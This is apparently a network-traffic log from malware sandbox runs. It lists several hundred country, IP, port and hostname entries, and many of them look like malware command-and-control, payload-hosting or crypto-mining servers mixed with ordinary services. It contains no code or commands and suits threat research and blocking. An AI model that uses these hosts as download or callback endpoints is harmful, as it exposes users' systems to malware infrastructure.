US 8.8.8.8:53 home.sevkk17sr.top udp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
GB 89.197.154.115:7700 tcp
US 104.21.62.142:443 zinc-sneark.biz tcp
GB 142.250.178.14:443 clients2.google.com tcp
US 20.83.148.22:80 tcp
US 172.67.153.96:443 dwell-exclaim.biz tcp
CN 113.201.158.62:80 src1.minibai.com tcp
US 172.67.173.74:443 formy-spill.biz tcp
CN 60.191.236.246:820 ywxww.net tcp
CN 47.101.28.200:80 ini.sh-pp.com tcp
KR 119.193.158.215:80 119.193.158.215 tcp
VN 14.243.221.170:2654 tcp
US 144.34.162.13:3333 fish.hackbiji.cc tcp
NL 149.154.167.99:443 tcp
KR 210.216.165.152:443 storage.soowim.co.kr tcp
US 208.122.221.162:80 funletters.net tcp
CN 60.191.236.246:820 ywxww.net tcp
CN 113.219.177.95:8087 tcp
DE 38.242.241.140:80 vmi2145130.contaboserver.net tcp
US 104.21.58.186:443 covery-mover.biz tcp
CN 119.45.127.116:8080 tcp
CA 50.65.169.30:81 tcp
IN 180.150.240.238:80 180.150.240.238 tcp
RU 89.175.24.90:8080 89.175.24.90 tcp
GB 89.197.154.115:7700 tcp
US 104.21.43.156:443 dare-curbys.biz tcp
CN 111.231.145.137:8888 tcp
TH 58.137.135.190:8080 58.137.135.190 tcp
HK 103.149.92.191:80 103.149.92.191 tcp
PL 217.12.206.79:80 tcp
CN 119.188.150.246:80 d.kpzip.com tcp
CN 101.126.11.168:80 tcp
US 185.208.156.226:80 185.208.156.226 tcp
HK 103.135.101.188:1930 wdearas.liveya.org tcp
DE 94.130.210.71:443 tcp
US 172.67.181.192:443 print-vexer.biz tcp
CN 47.104.173.216:9876 tcp
IL 195.60.232.6:100 195.60.232.6 tcp
KR 211.168.94.177:3389 tcp
US 185.199.109.133:443 media.githubusercontent.com tcp
KR 203.232.37.151:80 203.232.37.151 tcp
RU 87.251.102.94:80 87.251.102.94 tcp
DE 94.130.210.71:443 tcp
NL 194.26.192.76:8080 194.26.192.76 tcp
US 172.67.217.8:443 impend-differ.biz tcp
DE 94.130.210.71:443 tcp
GB 2.22.99.85:443 steamcommunity.com tcp
US 8.8.8.8:53 pub-37d3986658af451c9d52bb9f482b3e2d.r2.dev udp
US 8.8.8.8:53 237.140.159.162.in-addr.arpa udp
GB 89.197.154.115:7700 tcp
DE 94.130.210.71:443 tcp
JP 115.37.8.16:80 tcp
RU 185.215.113.84:80 tcp
US 194.147.100.3:80 tcp
DE 136.243.104.235:443 tcp
DE 94.130.210.71:443 tcp
GB 89.197.154.115:7700 tcp
BE 94.226.135.252:80 94.226.135.252 tcp
CN 116.114.98.35:80 tcp
RU 185.215.113.66:80 aefieiaehfiaehr.top tcp
KR 139.150.75.206:80 www.seetrol.com tcp
GB 89.197.154.115:7700 tcp
US 209.141.35.225:80 209.141.35.225 tcp
US 208.122.221.162:80 funletters.net tcp
FR 82.67.13.197:80 82.67.13.197 tcp
RU 176.111.174.138:8000 176.111.174.138 tcp
US 8.8.8.8:53 197.13.67.82.in-addr.arpa udp
RU 185.215.113.205:8080 185.215.113.205 tcp
CN 47.104.173.216:9876 tcp
RU 185.215.113.66:80 aefieiaehfiaehr.top tcp
ES 178.60.25.240:81 178.60.25.240 tcp
US 162.159.140.237:443 pub-37d3986658af451c9d52bb9f482b3e2d.r2.dev tcp
HK 47.240.68.28:81 coach.028csc.com tcp
CN 218.12.76.159:80 znrq.zifwxq.cn tcp
US 8.8.8.8:53 205.113.215.185.in-addr.arpa udp
BR 187.115.56.93:80 187.115.56.93 tcp
CN 39.105.31.193:1389 tcp
RU 176.113.115.33:80 176.113.115.33 tcp
AT 195.26.206.107:80 www.opolis.eu tcp
CN 60.191.208.187:820 123.ywxww.net tcp
BR 187.115.56.93:8081 187.115.56.93 tcp
CN 117.50.95.62:9880 tcp
CN 101.133.156.69:7777 tcp
HK 154.12.82.11:808 154.12.82.11 tcp
US 104.20.4.235:443 pastebin.com tcp
NL 188.42.129.148:80 rl.ammyy.com tcp
DE 185.232.59.135:80 up.maolaoban.top tcp
RU 185.215.113.66:80 aefieiaehfiaehr.top tcp
GB 89.197.154.115:7700 tcp
GB 89.197.154.115:7700 tcp
IR 217.172.98.87:80 karoonpc.com tcp
US 8.8.8.8:53 11.82.12.154.in-addr.arpa udp
US 8.8.8.8:53 ser.nrovn.xyz udp
HK 134.122.129.18:80 tcp
VN 103.77.173.146:8808 tcp
US 209.141.35.225:445 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
CN 222.244.110.238:8089 tcp
US 8.8.8.8:53 pb.agnt.ru udp
US 8.8.8.8:53 www.sumiyuki.co.jp udp
KR 121.53.201.236:80 cfs7.blog.daum.net tcp
RU 89.175.24.90:8080 89.175.24.90 tcp
TN 41.230.16.223:8889 tcp
JP 103.14.15.37:443 www.sumiyuki.co.jp tcp
RU 185.215.113.66:80 aefieiaehfiaehr.top tcp
CN 180.163.146.116:80 down.qqfarmer.com.cn tcp
RU 45.90.34.133:443 tcp
RU 176.113.115.37:80 tcp
US 8.8.8.8:53 www.google.com udp
US 68.108.119.30:22420 tcp
ES 47.62.190.226:80 tcp
AT 195.26.206.107:80 www.opolis.eu tcp
US 64.234.95.70:80 tcp
RS 79.101.0.33:443 tcp
GB 20.26.156.215:443 github.com tcp
KR 210.216.165.152:80 storage.soowim.co.kr tcp
JP 111.217.175.54:80 tcp
N/A 224.0.0.251:5353 udp
NL 185.208.158.96:80 tcp
RU 92.255.57.88:80 92.255.57.88 tcp
CN 47.120.46.210:80 tcp
CN 203.2.65.29:8086 tcp
US 52.111.229.43:443 tcp
HK 156.225.19.202:80 tcp
KR 221.143.46.92:80 tcp
CN 139.196.217.38:80 tengfeidn.com tcp
HK 103.87.10.156:50698 tcp
FR 85.25.72.70:80 tcp
GB 89.197.154.115:7700 tcp
NL 83.87.76.41:80 83-87-76-41.cable.dynamic.v4.ziggo.nl tcp
US 20.83.148.22:80 tcp
DE 94.130.210.71:443 tcp
DE 94.130.210.71:443 tcp
KR 139.150.75.206:80 tcp
RU 176.113.115.203:80 tcp
HK 47.240.68.28:81 coach.028csc.com tcp
DE 94.130.210.71:443 tcp
CN 52.83.32.119:8899 tcp
AT 91.142.27.138:80 qgf338jtt8tty7rx.myfritz.net tcp
DE 94.130.210.71:443 tcp
NL 18.239.63.19:443 tcp
NL 18.239.63.217:443 tcp
IE 185.166.142.21:443 tcp
HK 156.245.12.57:7778 tcp
US 8.8.8.8:53 cdn.ly.9377.com udp
RU 176.113.115.215:80 tcp
DE 94.130.210.71:443 tcp
US 20.83.148.22:80 tcp
DE 18.198.25.148:1604 tcp
DE 94.130.210.71:443 tcp
US 8.8.8.8:53 s.z163.xyz udp
US 66.254.114.41:443 www.pornhub.com tcp
VN 14.243.221.170:2654 tcp
DE 94.130.210.71:443 tcp
US 8.8.8.8:53 static.trafficjunky.com udp
HK 117.18.7.76:3782 tcp
GB 64.210.156.22:443 ss.phncdn.com tcp
GB 64.210.156.22:443 ss.phncdn.com tcp
GB 64.210.156.18:443 ss.phncdn.com tcp
GB 64.210.156.18:443 ss.phncdn.com tcp
GB 64.210.156.18:443 ss.phncdn.com tcp
GB 64.210.156.18:443 ss.phncdn.com tcp
GB 64.210.156.18:443 ss.phncdn.com tcp
GB 64.210.156.18:443 ss.phncdn.com tcp
US 8.8.8.8:53 media.trafficjunky.net udp
US 66.254.114.156:443 cdn1-smallimg.phncdn.com tcp
GB 64.210.156.18:443 media.trafficjunky.net tcp
US 45.32.92.201:5200 s.z163.xyz tcp
DE 94.130.210.71:443 tcp
GB 64.210.156.18:443 media.trafficjunky.net tcp
TH 45.141.26.170:7000 tcp
US 206.217.142.166:1234 tcp
CN 14.19.214.106:8283 c2.5yyz.com tcp
GB 89.197.154.115:7700 tcp
SG 168.138.162.78:80 168.138.162.78 tcp
CN 59.175.183.106:6713 tcp
HK 47.79.66.208:80 a18qqq1.oss-cn-hongkong.aliyuncs.com tcp
IN 122.170.110.131:9105 122.170.110.131 tcp
CL 190.215.253.57:80 190.215.253.57 tcp
RU 176.111.174.140:80 176.111.174.140 tcp
NL 194.26.192.76:8080 194.26.192.76 tcp
US 66.254.114.41:443 www.pornhub.com tcp
US 216.239.34.36:443 region1.google-analytics.com tcp
US 52.4.33.3:443 ads.traffichunt.com tcp
GB 64.210.156.18:443 media.trafficjunky.net tcp
CN 120.52.95.247:80 znrq.zifwxq.cn tcp
CN 119.167.229.190:80 mininews.kpzip.com tcp
CN 180.163.146.107:80 down.qqfarmer.com.cn tcp
CN 117.157.17.194:9999 tcp
HK 47.243.125.164:80 www.bkzj.wang tcp
CN 203.2.65.29:8087 tcp
UA 176.38.22.34:80 176.38.22.34 tcp
CN 139.159.155.204:81 tcp
DE 217.92.214.15:8088 217.92.214.15 tcp
CN 222.73.33.234:80 download.haozip.com tcp
RU 185.215.113.66:80 aefieiaehfiaehr.top tcp
TH 154.197.69.165:80 154.197.69.165 tcp
LK 192.248.13.186:80 192.248.13.186 tcp
US 185.199.110.133:443 media.githubusercontent.com tcp
RU 185.215.113.66:80 aefieiaehfiaehr.top tcp
TR 176.53.14.120:80 tcp
US 209.124.70.44:443 tcp
CN 110.40.32.156:80 tcp
HK 45.15.9.44:80 45.15.9.44 tcp
US 144.34.162.13:80 fish.hackbiji.cc tcp
CN 58.215.245.2:9000 tcp
GB 79.133.176.219:80 cdn.ly.9377.com tcp
CN 122.51.183.116:1234 tcp
IL 81.218.175.244:80 81.218.175.244 tcp
US 8.8.8.8:53 sister-1324943887.cos.ap-guangzhou.myqcloud.com udp
US 216.239.34.36:443 region1.google-analytics.com udp
US 185.199.111.133:443 media.githubusercontent.com tcp
IN 123.253.12.111:80 tcp
CN 39.103.217.92:80 tcp
US 34.102.78.64:9002 34.102.78.64 tcp
NL 18.239.63.181:443 tcp
US 8.8.8.8:53 3.33.4.52.in-addr.arpa udp
US 8.8.8.8:53 57.253.215.190.in-addr.arpa udp
US 8.8.8.8:53 34.22.38.176.in-addr.arpa udp
US 8.8.8.8:53 15.214.92.217.in-addr.arpa udp
US 8.8.8.8:53 219.176.133.79.in-addr.arpa udp
US 8.8.8.8:53 244.175.218.81.in-addr.arpa udp
US 8.8.8.8:53 44.70.124.209.in-addr.arpa udp
US 8.8.8.8:53 164.125.243.47.in-addr.arpa udp
US 8.8.8.8:53 186.13.248.192.in-addr.arpa udp
CN 47.98.177.117:8888 tcp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
ES 31.214.180.12:81 31.214.180.12 tcp
VN 103.167.89.125:80 103.167.89.125 tcp
VN 103.77.173.146:6606 tcp
US 52.217.70.132:443 bbuseruploads.s3.amazonaws.com tcp
BE 78.20.115.5:80 78-20-115-5.access.telenet.be tcp
KG 176.126.167.7:80 adv.gamer.kg tcp
RU 176.111.174.140:80 176.111.174.140 tcp
CN 47.110.247.171:80 tcp
HK 156.245.12.220:8000 156.245.12.220 tcp
CN 60.191.208.187:820 123.ywxww.net tcp
CN 159.75.57.69:443 sister-1324943887.cos.ap-guangzhou.myqcloud.com tcp
CN 101.72.233.67:80 src1.minibai.com tcp
SE 129.151.210.233:8000 129.151.210.233 tcp
CN 106.42.31.65:8088 tcp
DE 94.130.210.71:443 tcp
CN 116.114.98.35:80 download.skycn.com tcp
RU 176.111.174.140:80 176.111.174.140 tcp
CN 47.104.233.213:8072 tcp
NL 18.239.63.64:443 tcp
CN 123.132.224.187:14417 tcp
CN 60.191.208.187:820 123.ywxww.net tcp
CN 112.27.189.32:8090 tcp
CN 125.33.229.165:8085 tcp
DE 94.130.210.71:443 tcp
RU 176.111.174.140:80 176.111.174.140 tcp
RU 176.111.174.140:80 176.111.174.140 tcp
US 52.217.224.249:443 bbuseruploads.s3.amazonaws.com tcp
RU 176.111.174.140:80 176.111.174.140 tcp
RU 89.175.24.90:8080 89.175.24.90 tcp
CN 60.191.208.187:820 123.ywxww.net tcp
KR 210.116.108.238:80 server.toeicswt.co.kr tcp
CN 112.33.27.73:443 tcp
GB 165.220.134.146:80 165.220.134.146 tcp
DE 94.130.210.71:443 tcp
HK 47.79.66.205:443 a12xxx1.oss-cn-hongkong.aliyuncs.com tcp
CN 117.50.95.62:9880 paytest.infinitegalaxy.cn tcp
KR 211.249.219.23:80 cfs10.blog.daum.net tcp
CN 110.40.51.56:5700 tcp
HK 117.18.7.76:3782 tcp
RU 176.111.174.140:80 176.111.174.140 tcp
HK 154.201.87.30:8888 154.201.87.30 tcp
CN 111.231.145.137:8888 tcp
US 52.216.245.44:443 bbuseruploads.s3.amazonaws.com tcp
CN 111.231.145.137:8888 tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
US 20.83.148.22:8080 20.83.148.22 tcp
US 74.64.155.4:9090 74.64.155.4 tcp
NL 4.180.120.64:8000 4.180.120.64 tcp
RU 176.111.174.140:80 176.111.174.140 tcp
GB 89.197.154.115:7700 tcp
TR 31.145.124.122:443 www.teknoarge.com tcp
KR 112.217.207.130:80 tcp
IL 195.60.232.6:100 195.60.232.6 tcp
DE 185.88.60.242:80 nerve.untergrund.net tcp
CN 60.191.236.246:820 safe.ywxww.net tcp
NL 185.202.113.6:443 tcp
US 52.216.9.67:443 bbuseruploads.s3.amazonaws.com tcp
CN 125.38.214.65:80 src1.minibai.com tcp
RU 176.111.174.140:1912 tcp
RU 185.215.113.84:80 185.215.113.84 tcp
ID 103.123.98.86:8082 103.123.98.86 tcp
HK 47.79.66.210:80 a23uuu1.oss-cn-hongkong.aliyuncs.com tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
CN 112.5.156.15:20006 data.yhydl.com tcp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
US 20.83.148.22:80 tcp
CN 113.106.6.106:14417 tcp
GB 20.26.156.215:443 github.com tcp
RU 176.113.115.33:80 176.113.115.33 tcp
US 52.217.125.49:443 bbuseruploads.s3.amazonaws.com tcp
CN 123.235.29.162:6713 tcp
GB 20.26.156.215:80 github.com tcp
CN 183.57.21.131:8095 tcp
CN 120.76.203.28:80 client.9377.com tcp
VN 103.110.33.188:80 103.110.33.188 tcp
CN 121.40.100.23:12616 tcp
CN 183.57.21.131:8095 tcp
US 20.83.148.22:80 tcp
US 104.243.129.2:80 104.243.129.2 tcp
CN 112.124.28.233:5566 tcp
MA 102.53.15.18:80 102.53.15.18 tcp
US 3.5.28.167:443 bbuseruploads.s3.amazonaws.com tcp
RU 176.113.115.33:80 176.113.115.33 tcp
KR 146.56.118.137:80 146.56.118.137 tcp
VN 14.243.221.170:2654 tcp
CN 52.83.32.119:8899 tcp
TH 154.197.69.165:443 tcp
US 190.61.250.130:80 sfa.com.ar tcp
CN 116.142.249.59:80 dow.andylab.cn tcp
CN 139.159.155.204:88 tcp
US 3.5.30.82:443 bbuseruploads.s3.amazonaws.com tcp
SG 35.185.187.24:80 35.185.187.24 tcp
CN 117.50.95.62:9880 paytest.infinitegalaxy.cn tcp
HK 43.129.138.220:80 apps.game.qq.com tcp
KR 152.67.212.187:443 tcp
US 52.216.36.145:443 bbuseruploads.s3.amazonaws.com tcp
SG 35.185.187.24:80 35.185.187.24 tcp
NL 194.122.191.15:90 194.122.191.15 tcp
GB 89.197.154.115:7700 tcp
NL 92.63.197.221:80 92.63.197.221 tcp
DE 18.198.25.148:1604 tcp
KR 218.147.147.172:80 epei77.direct.quickconnect.to tcp
CN 27.159.75.161:80 tcp
CN 60.191.236.246:820 safe.ywxww.net tcp
US 20.83.148.22:80 tcp
RU 176.111.174.140:80 176.111.174.140 tcp
DE 146.0.42.82:80 146.0.42.82 tcp
SG 34.124.148.215:4444 tcp
SG 43.152.64.193:80 xss-1253555722.cos.ap-singapore.myqcloud.com tcp
RS 79.101.0.33:443 tcp
AU 110.143.54.213:80 110.143.54.213 tcp
CN 120.52.95.246:80 znrq.zifwxq.cn tcp
CN 122.228.207.55:80 tcp
CN 42.177.83.116:80 mininews.kpzip.com tcp
CN 180.163.146.112:80 down.qqfarmer.com.cn tcp
CN 101.226.26.197:80 download.haozip.com tcp
GB 89.197.154.115:7700 tcp
TH 147.50.240.62:80 147.50.240.62 tcp
US 20.83.148.22:80 tcp
RU 89.23.113.52:81 89.23.113.52 tcp
KG 176.126.167.7:80 adv.gamer.kg tcp
US 208.95.112.1:80 ip-api.com tcp
US 20.83.148.22:80 tcp
KG 176.126.167.7:80 adv.gamer.kg tcp
VN 103.167.89.125:80 103.167.89.125 tcp
CN 159.75.57.35:443 sister-1324943887.cos.ap-guangzhou.myqcloud.com tcp
CN 117.50.95.62:9880 paytest.infinitegalaxy.cn tcp
CN 8.134.12.90:80 tcp
US 144.34.162.13:80 fish.hackbiji.cc tcp
CN 123.60.59.48:80 tcp
RU 193.233.48.194:80 193.233.48.194 tcp
CN 101.200.220.118:8090 tcp
CN 60.191.208.187:820 123.ywxww.net tcp
AR 200.58.120.6:80 perfectperu.com tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
NO 217.149.124.92:80 download.innovare.no tcp
RU 87.236.16.222:443 www.saf-oil.ru tcp
TW 203.204.217.190:8080 203.204.217.190 tcp
US 166.166.188.230:80 230.sub-166-166-188.myvzw.com tcp
US 34.102.78.64:9002 34.102.78.64 tcp
CN 117.50.95.62:9880 paytest.infinitegalaxy.cn tcp
IT 5.157.110.232:80 5-157-110-232.dyn.eolo.it tcp
RU 185.215.113.84:80 185.215.113.84 tcp
ES 178.60.25.240:80 178.60.25.240 tcp
CN 119.32.29.121:8309 tcp
CN 112.5.156.15:20006 data.yhydl.com tcp
KR 210.216.165.152:443 storage.soowim.co.kr tcp
US 144.34.162.13:3333 fish.hackbiji.cc tcp
VN 103.77.173.146:6606 tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
US 20.83.148.22:80 tcp
KG 176.126.167.7:80 adv.gamer.kg tcp
CN 45.117.11.68:443 soft.wsyhn.com tcp
CN 120.41.21.100:9096 klfs.synology.me tcp
NL 185.202.113.6:80 185.202.113.6 tcp
RU 185.215.113.36:80 185.215.113.36 tcp
HK 154.201.87.30:8888 154.201.87.30 tcp
KG 176.126.167.7:80 adv.gamer.kg tcp
DE 172.105.66.118:80 172-105-66-118.ip.linodeusercontent.com tcp
CN 221.204.16.62:80 src1.minibai.com tcp
CN 101.133.156.69:7777 tcp
US 208.122.221.162:80 funletters.net tcp
CN 111.231.145.137:8888 tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
CN 58.16.114.29:8988 2.haory.cn tcp
CN 203.2.65.29:8085 tcp
CN 39.108.237.194:80 tcp
HK 117.18.7.76:3782 tcp
KG 176.126.167.7:80 adv.gamer.kg tcp
KR 115.71.237.171:80 support.clz.kr tcp
JP 137.220.142.69:443 sms-szfang.com tcp
KR 121.53.201.236:80 cfs13.tistory.com tcp
CN 60.191.236.246:820 safe.ywxww.net tcp
KG 176.126.167.7:80 adv.gamer.kg tcp
KG 176.126.167.7:80 adv.gamer.kg tcp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
KG 176.126.167.7:80 adv.gamer.kg tcp
CN 120.79.30.240:80 client.9377.com tcp
US 67.213.59.251:80 67.213.59.251 tcp
ES 83.175.202.178:80 soportegira.net tcp
US 209.94.90.2:443 bafybeicnmx2fcaolinpdaiqjo7hgsourg3qzaxf57psdrbqic4qrm4pf3i.ipfs.dweb.link tcp
GB 89.197.154.115:80 89.197.154.115 tcp
HK 103.59.103.198:80 103.59.103.198 tcp
CN 14.19.214.106:8283 c2.5yyz.com tcp
US 20.83.148.22:80 tcp
CN 47.104.173.216:9876 tcp
DE 172.105.66.118:8080 172-105-66-118.ip.linodeusercontent.com tcp
US 34.102.78.64:9002 34.102.78.64 tcp
CN 110.40.51.56:5700 tcp
HK 154.201.87.30:8888 154.201.87.30 tcp
RU 176.111.174.140:80 176.111.174.140 tcp
IT 185.81.0.56:80 www.netsolution.it tcp
KR 121.53.201.236:80 cfs13.tistory.com tcp
CN 222.186.172.42:1000 tcp
CN 36.110.15.211:9000 tcp
DE 38.242.241.140:80 vmi2145130.contaboserver.net tcp
RS 79.101.0.33:80 79.101.0.33 tcp
CN 42.56.81.104:80 dow.andylab.cn tcp
CN 125.33.229.165:8085 tcp
US 20.83.148.22:80 tcp
CN 60.191.236.246:820 safe.ywxww.net tcp
DE 85.10.193.220:80 tcp
CN 183.57.21.131:8095 tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
KR 146.56.118.137:80 146.56.118.137 tcp
GB 89.197.154.115:7700 tcp
VN 103.110.33.188:80 103.110.33.188 tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
VN 103.77.173.146:80 ser.nrovn.xyz tcp
KR 146.56.118.137:80 146.56.118.137 tcp
RU 176.111.174.140:443 tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
CN 203.2.65.29:8088 tcp
VN 14.243.221.170:2654 tcp
GB 216.58.212.227:443 update.googleapis.com tcp
GB 20.26.156.215:443 github.com tcp
BE 213.118.248.162:80 213.118.248.162 tcp
US 144.172.71.105:1338 144.172.71.105 tcp
HK 103.68.192.104:80 taodianla.com tcp
US 20.83.148.22:80 tcp
CN 52.83.32.119:8899 tcp
RU 185.215.113.36:80 185.215.113.36 tcp
CN 61.131.3.86:9991 tcp
RU 77.72.254.210:17017 77.72.254.210 tcp
MX 187.247.242.34:80 187.247.242.34 tcp
VN 103.216.119.164:80 xinhgai.tv tcp
VN 125.212.220.95:443 upload.vina-host.com tcp
GB 89.197.154.115:80 89.197.154.115 tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
DE 18.198.25.148:1604 tcp
CN 112.74.1.229:80 paonancs.oss-cn-shenzhen.aliyuncs.com tcp
NL 45.94.31.128:80 unvdwl.com tcp
CN 47.104.173.216:9876 tcp
CN 8.134.12.90:80 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
RS 79.101.0.33:80 79.101.0.33 tcp
GB 89.197.154.115:80 89.197.154.115 tcp
DE 185.88.60.242:80 nerve.untergrund.net tcp
US 208.122.221.162:80 funletters.net tcp
CN 119.32.29.121:8309 tcp
KR 203.232.37.151:80 203.232.37.151 tcp
GB 216.58.212.227:443 update.googleapis.com tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
US 66.63.187.231:80 66.63.187.231 tcp
CN 101.133.156.69:7777 tcp
CN 123.117.136.97:9000 tcp
IN 43.240.65.55:81 43.240.65.55 tcp
TH 154.197.69.165:80 154.197.69.165 tcp
RU 176.111.174.140:80 176.111.174.140 tcp
GB 89.197.154.115:7700 tcp
CN 115.28.26.10:8080 tcp
KR 154.90.62.248:80 154.90.62.248 tcp
CN 183.60.150.17:80 tcp
CN 180.163.146.113:80 down.qqfarmer.com.cn tcp
CN 218.12.76.158:80 znrq.zifwxq.cn tcp
CN 116.162.169.61:80 mininews.kpzip.com tcp
CN 101.226.28.238:80 download.haozip.com tcp
NL 31.214.157.124:443 tcp
US 20.83.148.22:80 tcp
CN 119.32.29.121:8309 tcp
PH 154.39.138.52:80 cat.xiaojiji.nl tcp
RU 31.41.244.11:80 31.41.244.11 tcp
US 158.101.35.62:9000 158.101.35.62 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
RU 77.72.254.210:17017 77.72.254.210 tcp
US 100.16.168.239:3216 100.16.168.239 tcp
US 8.8.8.8:53 1717.1000uc.com udp
TH 147.50.240.62:80 147.50.240.62 tcp
KR 203.232.37.151:80 203.232.37.151 tcp
CN 123.6.37.172:80 src1.minibai.com tcp
RU 185.215.113.16:80 185.215.113.16 tcp
CN 39.105.31.193:1389 tcp
VN 125.212.220.95:443 upload.vina-host.com tcp
CN 106.42.31.65:8088 tcp
US 8.8.8.8:53 62.35.101.158.in-addr.arpa udp
US 8.8.8.8:53 52.138.39.154.in-addr.arpa udp
GB 79.133.176.178:80 1717.1000uc.com tcp
CN 120.26.3.86:80 wz.3911.com tcp
CN 1.193.223.9:80 download.caihong.com tcp
CN 8.137.59.132:8888 tcp
RU 176.111.174.138:8000 176.111.174.138 tcp
US 20.83.148.22:8080 20.83.148.22 tcp
US 8.8.8.8:53 139520.aioc.qbgxl.com udp
US 8.8.8.8:53 vmi2145130.contaboserver.net udp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
GB 20.26.156.215:80 github.com tcp
CN 117.72.70.169:80 tcp
KR 183.115.102.3:80 183.115.102.3 tcp
DE 38.242.241.140:80 vmi2145130.contaboserver.net tcp
US 185.199.110.133:443 media.githubusercontent.com tcp
CN 61.160.195.64:80 139520.aioc.qbgxl.com tcp
CN 180.167.115.186:8011 tcp
RU 185.215.113.36:80 tcp
GB 89.197.154.115:7700 tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
US 20.83.148.22:80 tcp
RU 185.215.113.36:80 185.215.113.36 tcp
RU 193.233.48.194:80 193.233.48.194 tcp
US 20.83.148.22:80 tcp
CN 60.191.236.246:820 safe.ywxww.net tcp
US 23.241.17.95:80 23.241.17.95 tcp
FR 51.210.150.92:10343 xmr-eu2.nanopool.org tcp
GB 89.197.154.115:7700 tcp
HK 117.18.7.76:3782 tcp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
VN 103.77.173.146:8808 tcp
US 20.83.148.22:80 tcp
GB 89.197.154.115:7700 tcp
RU 193.233.48.194:80 193.233.48.194 tcp
US 20.83.148.22:80 tcp
DE 89.238.73.97:443 secure.eicar.org tcp
HK 103.68.192.104:80 taodianla.com tcp
CN 153.0.228.210:80 dow.andylab.cn tcp
KR 203.232.37.151:80 203.232.37.151 tcp
KR 115.71.237.171:80 support.clz.kr tcp
CN 47.104.173.216:8082 tcp
CN 222.186.172.42:1000 tcp
FR 82.127.74.198:5000 82.127.74.198 tcp
CN 60.191.236.246:820 safe.ywxww.net tcp
RU 176.111.174.140:80 176.111.174.140 tcp
CN 61.131.3.86:9991 tcp
CN 113.106.6.106:14319 tcp
US 208.122.221.162:80 funletters.net tcp
IE 185.166.142.21:443 bitbucket.org tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
LU 107.189.5.6:80 107.189.5.6 tcp
RU 77.72.254.210:17017 77.72.254.210 tcp
GB 2.18.190.80:80 r10.o.lencr.org tcp
RU 94.198.55.181:4337 tcp
VN 14.243.221.170:2654 tcp
US 144.172.71.105:1338 144.172.71.105 tcp
GB 89.197.154.115:7700 tcp
US 20.83.148.22:80 tcp
US 209.141.35.225:80 209.141.35.225 tcp
CN 47.98.177.117:8888 tcp
VN 103.110.33.188:80 103.110.33.188 tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
RU 176.111.174.140:80 176.111.174.140 tcp
US 208.122.221.162:80 funletters.net tcp
US 66.63.187.231:80 66.63.187.231 tcp
SG 35.185.187.24:80 35.185.187.24 tcp
KR 152.67.212.187:443 tcp
GB 89.197.154.115:80 89.197.154.115 tcp
CN 61.170.80.228:80 download.haozip.com tcp
GB 89.197.154.115:7700 tcp
DE 18.198.25.148:1604 tcp
CN 119.32.29.121:8309 tcp
CN 111.231.145.137:8888 tcp
CN 180.163.146.111:80 down.qqfarmer.com.cn tcp
CN 60.28.220.184:80 mininews.kpzip.com tcp
RU 176.111.174.140:443 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
US 208.122.221.162:80 funletters.net tcp
CN 49.234.48.162:80 tcp
CN 8.138.81.152:5555 tcp
US 172.67.189.30:80 downsexv.com tcp
DE 38.242.241.140:80 vmi2145130.contaboserver.net tcp
US 52.216.205.19:443 tcp
CN 60.191.236.246:820 safe.ywxww.net tcp
CN 101.200.220.118:8090 tcp
CN 183.57.21.131:8095 tcp
KR 146.56.118.137:80 146.56.118.137 tcp
TH 154.197.69.165:80 154.197.69.165 tcp
CN 223.247.198.16:14319 tcp
US 20.83.148.22:80 tcp
KR 152.67.212.187:443 tcp
KR 210.216.165.152:443 storage.soowim.co.kr tcp
GB 89.197.154.115:7700 tcp
KR 152.67.212.187:443 tcp
RU 176.111.174.140:1912 tcp
CN 60.191.208.187:820 123.ywxww.net tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
US 20.83.148.22:8080 20.83.148.22 tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
KR 146.56.118.137:80 146.56.118.137 tcp
US 52.217.235.9:443 tcp
CN 111.231.145.137:8888 tcp
CN 106.42.31.65:8088 tcp
GB 89.197.154.115:7700 tcp
US 208.122.221.162:80 funletters.net tcp
GB 89.197.154.115:7700 tcp
VN 103.216.119.164:80 xinhgai.tv tcp
US 3.5.29.56:443 tcp
NL 92.63.197.221:80 92.63.197.221 tcp
CN 36.250.243.20:80 src1.minibai.com tcp
CN 123.6.122.239:80 download.caihong.com tcp
US 20.83.148.22:80 tcp
GB 89.197.154.115:7700 tcp
CN 222.186.172.42:1000 tcp
CN 117.72.70.169:80 tcp
US 20.83.148.22:80 tcp
RU 193.233.48.194:80 tcp
US 54.231.231.17:443 tcp
US 172.67.189.30:8080 downsexv.com tcp
DE 185.254.96.230:4608 tcp
GB 89.197.154.115:7700 tcp
US 20.83.148.22:80 tcp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
VE 167.250.49.155:80 167.250.49.155 tcp
US 20.83.148.22:80 tcp
HK 117.18.7.76:3782 tcp
FR 20.209.8.43:443 pouya.blob.core.windows.net tcp
DE 38.242.241.140:80 vmi2145130.contaboserver.net tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
VN 103.77.173.146:6606 tcp
